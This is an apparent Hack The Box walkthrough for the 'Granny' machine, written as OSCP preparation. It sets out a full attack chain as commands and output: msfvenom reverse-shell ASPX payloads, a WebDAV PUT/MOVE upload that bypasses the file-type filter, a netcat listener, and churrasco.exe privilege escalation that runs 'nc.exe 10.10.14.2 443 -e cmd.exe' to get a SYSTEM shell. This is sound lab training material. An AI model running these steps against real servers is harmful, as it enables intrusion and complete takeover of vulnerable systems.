In this practice box from Hack The Box (HTB), we explore one of the machines from TJNull’s list, which is widely recognized as part of the essential preparation for the Offensive Security Certified Professional (OSCP) exam. TJNull’s curated list is designed to help individuals hone their penetration testing skills and get accustomed to the types of challenges they’ll face during the OSCP. This particular box reflects the practical, hands-on nature of the OSCP certification process, providing an excellent opportunity for learners to test and expand their knowledge in a controlled, realistic environment. Whether you’re a seasoned security professional or just starting, working through this box will be a valuable step in your OSCP preparation journey.
Nmap scan and results
# Nmap 7.94 scan initiated Thu Oct 19 23:37:25 2023 as: nmap -vv --reason -Pn -T4 -sV -sC --version-all -A --osscan-guess -oN /home/kali/HTB/granny/results/10.10.10.15/scans/_quick_tcp_nmap.txt -oX /home/kali/HTB/granny/results/10.10.10.15/scans/xml/_quick_tcp_nmap.xml 10.10.10.15
Nmap scan report for 10.10.10.15
Host is up, received user-set (0.34s latency).
Scanned at 2023-10-19 23:37:32 EDT for 35s
Not shown: 999 filtered tcp ports (no-response)
PORT STATE SERVICE REASON VERSION
80/tcp open http syn-ack Microsoft IIS httpd 6.0
| http-webdav-scan:
| Public Options: OPTIONS, TRACE, GET, HEAD, DELETE, PUT, POST, COPY, MOVE, MKCOL, PROPFIND, PROPPATCH, LOCK, UNLOCK, SEARCH
| Server Type: Microsoft-IIS/6.0
| WebDAV type: Unknown
| Allowed Methods: OPTIONS, TRACE, GET, HEAD, DELETE, COPY, MOVE, PROPFIND, PROPPATCH, SEARCH, MKCOL, LOCK, UNLOCK
|_ Server Date: Fri, 20 Oct 2023 03:38:01 GMT
| http-methods:
| Supported Methods: OPTIONS TRACE GET HEAD DELETE COPY MOVE PROPFIND PROPPATCH SEARCH MKCOL LOCK UNLOCK PUT POST
|_ Potentially risky methods: TRACE DELETE COPY MOVE PROPFIND PROPPATCH SEARCH MKCOL LOCK UNLOCK PUT
|_http-server-header: Microsoft-IIS/6.0
|_http-title: Under Construction
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Thu Oct 19 23:38:07 2023 -- 1 IP address (1 host up) scanned in 42.05 seconds
Nikto results
- Nikto v2.5.0
---------------------------------------------------------------------------
+ Target IP: 10.10.10.15
+ Target Hostname: 10.10.10.15
+ Target Port: 80
+ Start Time: 2023-10-19 23:38:10 (GMT-4)
---------------------------------------------------------------------------
+ Server: Microsoft-IIS/6.0
+ /: Retrieved microsoftofficewebserver header: 5.0_Pub.
+ /: Retrieved x-powered-by header: ASP.NET.
+ /: The anti-clickjacking X-Frame-Options header is not present. See: https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/X-Frame-Options
+ /: Uncommon header 'microsoftofficewebserver' found, with contents: 5.0_Pub.
+ /: The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type. See: https://www.netsparker.com/web-vulnerability-scanner/vulnerabilities/missing-content-type-header/
+ /8wM33dO2.axd: Retrieved x-aspnet-version header: 1.1.4322.
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ /nikto-test-SMiPy4qL.html: HTTP method 'PUT' allows clients to save files on the web server. See: https://portswigger.net/kb/issues/00100900_http-put-method-is-enabled
+ /nikto-test-SMiPy4qL.html: HTTP method 'DELETE' allows clients to delete files on the web server. See: https://cwe.mitre.org/data/definitions/650.html
+ OPTIONS: Allowed HTTP Methods: OPTIONS, TRACE, GET, HEAD, DELETE, PUT, POST, COPY, MOVE, MKCOL, PROPFIND, PROPPATCH, LOCK, UNLOCK, SEARCH .
+ HTTP method ('Allow' Header): 'DELETE' may allow clients to remove files on the web server.
+ HTTP method ('Allow' Header): 'PUT' method could allow clients to save files on the web server.
+ HTTP method ('Allow' Header): 'MOVE' may allow clients to change file locations on the web server.
+ OPTIONS: Public HTTP Methods: OPTIONS, TRACE, GET, HEAD, DELETE, PUT, POST, COPY, MOVE, MKCOL, PROPFIND, PROPPATCH, LOCK, UNLOCK, SEARCH .
+ HTTP method ('Public' Header): 'DELETE' may allow clients to remove files on the web server.
+ HTTP method ('Public' Header): 'PUT' method could allow clients to save files on the web server.
+ HTTP method ('Public' Header): 'MOVE' may allow clients to change file locations on the web server.
+ OPTIONS: WebDAV enabled (UNLOCK COPY PROPPATCH MKCOL SEARCH PROPFIND LOCK listed as allowed).
+ /: PROPFIND HTTP verb may show the server's internal IP address: http://granny/_vti_bin/_vti_aut/author.dll. See: https://docs.microsoft.com/en-us/previous-versions/office/developer/exchange-server-2003/aa142960(v%3Dexchg.65)
+ /_vti_bin/shtml.exe: Attackers may be able to crash FrontPage by requesting a DOS device, like shtml.exe/aux.htm -- a DoS was not attempted. See: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-0709
+ /postinfo.html: Microsoft FrontPage default file found. See: CWE-552
+ /_vti_bin/shtml.exe/_vti_rpc: FrontPage may be installed. See: https://en.wikipedia.org/wiki/Microsoft_FrontPage
+ /_private/: FrontPage directory found. See: https://en.wikipedia.org/wiki/Microsoft_FrontPage
+ /_vti_bin/: FrontPage directory found. See: https://en.wikipedia.org/wiki/Microsoft_FrontPage
+ /_vti_inf.html: FrontPage/SharePoint is installed and reveals its version number (check HTML source for more information). See: https://en.wikipedia.org/wiki/Microsoft_FrontPage
+ /_vti_bin/: shtml.exe/shtml.dll is available remotely. Some versions of the Front Page ISAPI filter are vulnerable to a DOS (not attempted). See: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-0709
+ /_vti_bin/fpcount.exe: Frontpage counter CGI has been found. FP Server version 97 allows remote users to execute arbitrary system commands, though a vulnerability in this version could not be confirmed. See: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-1376
+ /_vti_bin/shtml.dll/_vti_rpc: The anonymous FrontPage user is revealed through a crafted POST. See: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-0114
+ /_vti_bin/_vti_adm/admin.dll: FrontPage/SharePoint file found.
+ /_vti_bin/_vti_adm/admin.exe: FrontPage/Sharepointfile available.
+ /_vti_bin/_vti_aut/author.exe: FrontPage/Sharepointfile available.
+ /_vti_bin/_vti_aut/author.dll: FrontPage/Sharepointfile available.
+ 7676 requests: 0 error(s) and 31 item(s) reported on remote host
+ End Time: 2023-10-20 00:22:39 (GMT-4) (2669 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested
edit hosts file
╰─$ cat /etc/hosts
127.0.0.1 localhost
127.0.1.1 kali
::1 localhost ip6-localhost ip6-loopback
ff02::1 ip6-allnodes
ff02::2 ip6-allrouters
10.10.10.175 EGOTISTICAL-BANK.LOCAL
10.10.10.100 active.htb htb
10.10.10.192 blackfield.local
10.10.10.182 cascade.local
10.10.11.152 timelapse.htb
10.10.10.52 htb.local mantis.htb.local
10.10.10.179 MEGACORP.LOCAL MULTIMASTER.MEGACORP.LOCAL
10.10.10.172 MEGABANK.LOCAL MONTEVERDE.MEGABANK.LOCAL
10.10.10.248 intelligence.htb dc.intelligence.htb
192.168.173.165 heist.offsec DC01.heist.offsec
10.10.10.15 granny
From nikto we can upload files using PUT
creates a reverse shell. Created two as not sure if x86 x64
-f aspx -o shell64.aspx
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x64 from the payload
No encoder specified, outputting raw payload
Payload size: 460 bytes
Final size of aspx file: 3390 bytes
Saved as: shell64.aspx
╭─kali@kali ~/HTB/granny
╰─$ msfvenom -p windows/shell_reverse_tcp LHOST=10.10.14.2 LPORT=80 EXITFUNC=thread -f aspx -o shell86.aspx
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x86 from the payload
No encoder specified, outputting raw payload
Payload size: 324 bytes
Final size of aspx file: 2709 bytes
Saved as: shell86.aspx
╭─kali@kali ~/HTB/granny
╰─$
Tried to upload using curl but failed . Tested with txt and can upload
made .exe.gif from the two files so as to trick the upload
uploading this file and the x64 files using curl
╭─kali@kali ~/HTB/granny
╰─$ cp shell86.aspx shell86.aspx.txt 130 ↵
╭─kali@kali ~/HTB/granny
╰─$
copy the file with curl and PUT
╭─kali@kali ~/HTB/granny
╰─$ curl -X PUT --upload-file shell86.aspx.txt http://granny/shell86.aspx.txt
╭─kali@kali ~/HTB/granny
╰─$
Use MOVE (confirmed by nikto results as possible) to name it back to aspx
╰─$ curl -X MOVE --header "Destination:http://granny/shell86.aspx " http://granny/shell86.aspx.txt
╭─kali@kali ~/HTB/granny
╰─$
set up listener on port 80 and run the aspx file from web browser and we catch the shell
╭─kali@kali ~/HTB/granny/Windows-Exploit-Suggester ‹master●›
╰─$ nc -nlvp 80 1 ↵
listening on [any] 80 ...
connect to [10.10.14.2] from (UNKNOWN) [10.10.10.15] 1040
Microsoft Windows [Version 5.2.3790]
(C) Copyright 1985-2003 Microsoft Corp.
c:\windows\system32\inetsrv>
Priv esc
check and import system info. WIndows server 2003
c:\windows\system32\inetsrv>systeminfo
systeminfo
Host Name: GRANNY
OS Name: Microsoft(R) Windows(R) Server 2003, Standard Edition
OS Version: 5.2.3790 Service Pack 2 Build 3790
OS Manufacturer: Microsoft Corporation
OS Configuration: Standalone Server
OS Build Type: Uniprocessor Free
Registered Owner: HTB
Registered Organization: HTB
Product ID: 69712-296-0024942-44782
Original Install Date: 4/12/2017, 5:07:40 PM
System Up Time: 0 Days, 6 Hours, 29 Minutes, 35 Seconds
System Manufacturer: VMware, Inc.
System Model: VMware Virtual Platform
System Type: X86-based PC
Processor(s): 1 Processor(s) Installed.
[01]: x86 Family 23 Model 49 Stepping 0 AuthenticAMD ~2994 Mhz
BIOS Version: INTEL - 6040000
Windows Directory: C:\WINDOWS
System Directory: C:\WINDOWS\system32
Boot Device: \Device\HarddiskVolume1
System Locale: en-us;English (United States)
Input Locale: en-us;English (United States)
Time Zone: (GMT+02:00) Athens, Beirut, Istanbul, Minsk
Total Physical Memory: 1,023 MB
Available Physical Memory: 736 MB
Page File: Max Size: 2,470 MB
Page File: Available: 2,277 MB
Page File: In Use: 193 MB
Page File Location(s): C:\pagefile.sys
Domain: HTB
Logon Server: N/A
Hotfix(s): 1 Hotfix(s) Installed.
[01]: Q147222
Network Card(s): N/A
c:\windows\system32\inetsrv>
did a searchsploit and narrowed down to this after checking on expoloit db that its verified
Microsoft Windows Server 2003 - '.EOT' Blue Screen of Death Crash | windows/dos/9417.txt
Microsoft Windows Server 2003 - AD BROWSER ELECTION Remote Heap Over | windows/dos/16166.py
Microsoft Windows Server 2003 - NetpIsRemote() Remote Overflow (MS06 | windows/remote/2355.pm
Microsoft Windows Server 2003 - Token Kidnapping Local Privilege Esc | windows/local/6705.txt
Microsoft Windows Server 2003 SP2 - Local Privilege Escalation (MS14 | windows/local/35936.py
downloaded the file from — https://github.com/Re4son/Churrasco/raw/master/churrasco.exe
─$ wget https://github.com/Re4son/Churrasco/raw/master/churrasco.exe
--2023-10-20 06:10:46-- https://github.com/Re4son/Churrasco/raw/master/churrasco.exe
Resolving github.com (github.com)... 20.248.137.48
Connecting to github.com (github.com)|20.248.137.48|:443... connected.
HTTP request sent, awaiting response... 302 Found
Location: https://raw.githubusercontent.com/Re4son/Churrasco/master/churrasco.exe [following]
--2023-10-20 06:10:47-- https://raw.githubusercontent.com/Re4son/Churrasco/master/churrasco.exe
Resolving raw.githubusercontent.com (raw.githubusercontent.com)... 185.199.108.133, 185.199.109.133, 185.199.110.133, ...
Connecting to raw.githubusercontent.com (raw.githubusercontent.com)|185.199.108.133|:443... connected.
HTTP request sent, awaiting response... 200 OK
Length: 31232 (30K) [application/octet-stream]
Saving to: ‘churrasco.exe.1’
churrasco.exe.1 100%[====================================>] 30.50K --.-KB/s in 0.001s
2023-10-20 06:10:47 (28.3 MB/s) - ‘churrasco.exe.1’ saved [31232/31232]
╭─kali@kali ~/HTB/granny
The command we will need to run is churrasco.exe -d "command"
We will upload the file the same way we uploaded the initial files and we will also upload nc.exe
anny
╰─$ curl -X MOVE --header "Destination:http://granny/churrasco.exe" http://granny/churrasco.exe.gif
╭─kali@kali ~/HTB/granny
╰─$ curl -X PUT --upload-file nc.exe http://granny/nc.exe.txt
╭─kali@kali ~/HTB/granny
╰─$ curl -X MOVE --header "Destination:http://granny/nc.exe" http://granny/nc.exe.txt
╭─kali@kali ~/HTB/granny
we run the file from where they are uploaded in wwwroot on the windows machine we will set up a lictener and send cmd.exe via netcat
C:\Inetpub\wwwroot>dir
dir
Volume in drive C has no label.
Volume Serial Number is 424C-F32D
Directory of C:\Inetpub\wwwroot
10/20/2023 01:14 PM <DIR> .
10/20/2023 01:14 PM <DIR> ..
04/12/2017 05:17 PM <DIR> aspnet_client
10/20/2023 01:13 PM 31,232 churrasco.exe
02/21/2003 06:48 PM 1,433 iisstart.htm
04/12/2017 05:17 PM <DIR> images
10/20/2023 01:13 PM 59,392 nc.exe
02/21/2003 06:48 PM 2,806 pagerror.gif
04/12/2017 05:17 PM 2,440 postinfo.html
10/20/2023 07:45 AM 7,168 reverse64.exe
10/20/2023 07:46 AM 73,802 reverse86.exe
10/20/2023 10:08 AM 70 rub.bat.txt
10/20/2023 08:01 AM 3,410 shell64.aspx
10/20/2023 01:01 PM 2,709 shell86.aspx
10/20/2023 07:48 AM 5 test.gif
04/12/2017 05:17 PM <DIR> _private
04/12/2017 05:17 PM 1,754 _vti_inf.html
04/12/2017 05:17 PM <DIR> _vti_log
12 File(s) 186,221 bytes
6 Dir(s) 1,298,030,592 bytes free
C:\Inetpub\wwwroot>.\churrasco.exe -d "C:\Inetpub\wwwroot\nc.exe 10.10.14.2 443 -e cmd.exe"
.\churrasco.exe -d "C:\Inetpub\wwwroot\nc.exe 10.10.14.2 443 -e cmd.exe"
/churrasco/-->Current User: NETWORK SERVICE
/churrasco/-->Getting Rpcss PID ...
/churrasco/-->Found Rpcss PID: 668
/churrasco/-->Searching for Rpcss threads ...
/churrasco/-->Found Thread: 672
/churrasco/-->Thread not impersonating, looking for another thread...
/churrasco/-->Found Thread: 676
/churrasco/-->Thread not impersonating, looking for another thread...
/churrasco/-->Found Thread: 684
/churrasco/-->Thread impersonating, got NETWORK SERVICE Token: 0x730
/churrasco/-->Getting SYSTEM token from Rpcss Service...
/churrasco/-->Found NETWORK SERVICE Token
/churrasco/-->Found LOCAL SERVICE Token
/churrasco/-->Found SYSTEM token 0x728
/churrasco/-->Running command with SYSTEM Token...
/churrasco/-->Done, command should have ran as SYSTEM!
C:\Inetpub\wwwroot>
we catch it with ncat and confirm that we are admin
╭─kali@kali ~/HTB/granny
╰─$ nc -nlvp 443
listening on [any] 443 ...
connect to [10.10.14.2] from (UNKNOWN) [10.10.10.15] 1041
Microsoft Windows [Version 5.2.3790]
(C) Copyright 1985-2003 Microsoft Corp.
C:\WINDOWS\TEMP>whoami
whoami
nt authority\system
C:\WINDOWS\TEMP>